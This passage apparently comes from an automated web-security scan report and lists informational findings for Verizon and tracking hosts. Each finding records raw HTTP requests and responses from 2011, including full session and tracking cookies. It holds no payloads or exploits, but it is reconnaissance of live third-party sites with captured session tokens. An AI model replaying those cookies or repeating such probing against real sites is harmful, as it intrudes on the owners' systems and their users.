Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:10:28 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 318
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR.............l..'....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....
.0.E.R.d....c.!X..<nG1 ...o......[R`G\N...I....w.........*R.+x(......H.FH.z...q.I.5PDQ...bt.G...5p
...[SNIP]...

24.27. http://headlines.verizon.com/headlines/resources/images/verizonEmail.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/verizonEmail.png

Request

GET /headlines/resources/images/verizonEmail.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:10:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 868
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...`.........?.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y=..@...D...D......cJ..?..!.\D....(I..E..D../..D.@Jq.%~.........4.7.'q.;...._..ff...i.N...k....@@.@@
...[SNIP]...

24.28. http://phones.verizonwireless.com/htc/thunderbolt/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://phones.verizonwireless.com
Path:	/htc/thunderbolt/

Request

Response

24.29. http://promo.verizon.com/omk/online.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://promo.verizon.com
Path:	/omk/online.shtml

Request

GET /omk/online.shtml HTTP/1.1
Host: promo.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#sclient=psy&hl=en&source=hp&q=site:verizon.com+online+news+webmail&pbx=1&oq=site:verizon.com+online+news+webmail&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4585l6285l1l6781l2l2l0l0l0l0l144l261l0.2l2l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:42:17 GMT
Content-Length: 18539

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon
...[SNIP]...

24.30. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Request

Response

24.31. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.32. http://search.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Request

GET /?tp=l&rv=l&q=xss&search.x=0&search.y=0 HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:49 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 50685

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...

24.33. https://secure.opinionlab.com/rate36_json.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/rate36_json.asp

Request

GET /rate36_json.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

24.34. https://secure.opinionlab.com/rate36s.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/rate36s.asp

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

24.35. http://tags.bluekai.com/site/4335 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4335

Request

GET /site/4335?ret=html&r=73197&phint=lpLanguage%3Denglish&phint=vzserve%3Dhttps%3A%2F%2Fmyaccount.verizonwireless.com&phint=Keywords%3DVerizon%20Wireless%2CCell%20Phones%2CMobile%20Phones%2CCellular%20Phone%2CCell%20Phone&phint=googlebot%3DNOODP&phint=bk_t%3DCell%20Phones%20-%20Smartphones%3A%20Cell%20Phone%20Service%2C%20Accessories%20-%20Verizon%20Wireless&phint=bk_k%3DVerizon%20Wireless%2CCell%20Phones%2CMobile%20Phones%2CCellular%20Phone%2CCell%20Phone&phint=bk_pr%3Dhttp%3A%2F%2Fwww22.verizon.com%2Fcontent%2Fverizonglobalhome%2Fghp_landing.aspx HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:04 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: 497b
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>

24.36. http://tags.bluekai.com/site/4357 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4357

Request

Response

24.37. http://verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://verizon.com
Path:	/

Request

GET / HTTP/1.1
Host: verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 05 Sep 2011 22:27:38 GMT
Content-length: 11095
Content-type: text/html
Etag: "6d27ef85-1-0-2b57"
Last-modified: Mon, 04 Oct 2010 17:07:03 GMT
Accept-ranges: bytes

<html>
<head>





<SCRIPT
...[SNIP]...

24.38. http://verizonconnections.vzcomportal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://verizonconnections.vzcomportal.com
Path:	/

Request

GET / HTTP/1.1
Host: verizonconnections.vzcomportal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 18 Jul 2011 18:34:50 GMT
Accept-Ranges: bytes
ETag: "0418b607945cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 4652

<!doctype html>


<!--[if IE 8 ]> <html class="no-js ie ie8" l
...[SNIP]...

24.39. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://verizonwireless.tt.omtrdc.net
Path:	/m2/verizonwireless/mbox/standard

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278939788-568601&mboxPage=1315278939788-568601&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxCount=17&mbox=Prospects_RightMinorPromoBox&mboxId=0&mboxTime=1315260961648&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww22.verizon.com%2Fcontent%2Fverizonglobalhome%2Fghp_landing.aspx&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:11:17 GMT
Connection: close
Content-Type: text/html

// ERROR: application server timeout.
if (mboxVersion >= 33) {
mboxFactories.get('default').getMboxes().each(function(m){m.setOffer(new mboxOfferDefault()).loaded();});
} else if (mboxVersion >= 31)
...[SNIP]...

24.40. http://webmail.verizonemail.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/

Request

GET / HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:54 GMT
Content-length: 162
Content-type: text/html
Etag: "b1f727c1-1-0-a2"
Last-modified: Sun, 13 Feb 2005 21:46:37 GMT
Accept-ranges: bytes

<HTML>
<HEAD><TITLE>Verizon Central</TITLE>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=/webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B">
</HEAD>
</HTML>

24.41. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/webmail/servlet/HttpNimletDriver

Request

Response

24.42. http://www.connecttoverizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/

Request

Response

24.43. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Request

Response

24.44. http://www.connecttoverizon.com/order-now.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/order-now.html

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.45. http://www.verizon.com/fiostv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizon.com
Path:	/fiostv

Request

GET /fiostv HTTP/1.1
Host: www.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6282dbf2577831504cc275f53753f4ee:1248144899"
Last-Modified: Tue, 21 Jul 2009 02:54:59 GMT
Accept-Ranges: bytes
Content-Length: 11130
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:18:28 GMT
Connection: close

<html>
<head>





<SCRIPT
...[SNIP]...

24.46. http://www.verizonbusiness.com/Medium/about/promotions/ida_t1/%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/ida_t1/%20

Request

GET /Medium/about/promotions/ida_t1/%20 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Last-Modified: Mon, 05 Sep 2011 22:36:37 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 22720
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:36:37 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:36:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

24.47. http://www22.verizon.com/copyright previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/copyright

Request

GET /copyright HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:54 GMT
Content-Length: 285
Connection: close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon</title>
<meta http-equiv="refresh" content="0;URL=htt
...[SNIP]...

24.48. http://www22.verizon.com/wholesale/solutions/solution/physical%2bcollo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/wholesale/solutions/solution/physical%2bcollo.html

Request

GET /wholesale/solutions/solution/physical%2bcollo.html HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 62922
Content-Type: text/html
X-N: S
Date: Mon, 05 Sep 2011 22:23:19 GMT
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<link href="/wholesale/includes/styles/ws_global.css" rel="styl
...[SNIP]...

24.49. https://www22.verizon.com/foryourhome/registration/forgotuid/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/foryourhome/registration/forgotuid/javascript:void(0)

Request

GET /foryourhome/registration/forgotuid/javascript:void(0) HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.50. https://www22.verizon.com/includes/javascript/commonjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/commonjs/

Request

Response

24.51. https://www22.verizon.com/includes/javascript/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/oo_engine_c.js

Request

Response

24.52. https://www22.verizon.com/myverizon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/myverizon/

Request

Response

24.53. https://www22.verizon.com/vzTracker/vzTracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/vzTracker/vzTracker.aspx

Request

GET /vzTracker/vzTracker.aspx?appName=ECSP_OLH&type=1&requestUrl=http%3A//www22.verizon.com/ResidentialHelp/Generic/Ask%2520Verizon/Getting%2520Started/124519.htm&referrer=http%3A//www22.verizon.com/residential/fiostv%3FCMP%3DDMC-CV090057%23&Title=Verizon%20%7C%20-%20How%20do%20I%20use%20Ask%20Verizon%3F&Lang=en-US&scrRes=1920X1200&scrdepth=16&id=2638553949072.957 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; 